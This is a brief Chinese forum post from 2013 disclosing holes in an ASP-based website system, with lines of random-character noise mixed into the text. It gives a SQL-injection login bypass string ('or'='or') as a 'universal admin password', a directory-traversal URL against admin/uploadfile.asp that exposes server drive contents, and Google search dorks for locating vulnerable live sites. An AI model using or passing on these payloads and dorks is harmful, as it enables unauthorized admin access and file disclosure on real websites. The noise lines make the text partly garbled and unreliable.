后台万能密码 'or'='or'
2 ]# y: @# F: M, \; K% h! d8 ?7 T2 ~ X: C4 V# J& z8 }
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!; Q+ |4 s1 k( M# d
admin/uploadfile.asp?currentFolder=/upfiles/../, s! I" y8 m& y
8 q. D# y3 s) v, v
漏洞证明:
. |% }3 s2 {( F: }7 b9 ~# r) K' P* B! V
谷歌:inurl:type.asp?id=1 新闻中心
; }, t/ K( N3 X或者 :inurl:download_ok.asp?( A y- a/ a. C' o% L
' C' c/ J% }6 I
|
发表于 2013-3-14 20:17:32
收藏
分享
支持
反对